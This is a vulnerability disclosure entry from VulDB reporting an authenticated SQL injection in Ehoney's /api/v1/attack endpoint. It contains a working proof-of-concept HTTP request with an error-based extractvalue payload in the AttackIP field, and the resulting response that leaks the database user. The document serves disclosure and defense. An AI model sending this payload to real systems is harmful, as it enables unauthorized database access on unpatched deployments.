| Titre | Ehoney <= v3.0.0 Authenticated SQL injection via /api/v1/attack route |
|---|
| Description | repo:
https://github.com/seccome/Ehoney
## requests
POST /api/v1/attack HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo
Content-Length: 211
Content-Type: application/json
Host: x.x.x.x:8080
{
"Payload": "",
"AttackIP": "' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) #",
"ProbeIP": "",
"JumpIP": "",
"HoneypotIP": "",
"ProtocolType": "",
"PageNumber": 1,
"PageSize": 1
}
## response
{
"code": 1006,
"msg": "数据库异常",
"data": "Error 1105: XPATH syntax error: '[email protected]~'; Error 1105: XPATH syntax error: '[email protected]~'"
}
## affected code
https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/models/attack.go#L35
|
|---|
| Utilisateur | Anonymous User |
|---|
| Soumission | 26/10/2022 03:44 (il y a 3 ans) |
|---|
| Modérer | 28/10/2022 07:26 (2 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 212411 [seccome Ehoney /api/v1/attack AttackIP injection SQL] |
|---|
| Points | 17 |
|---|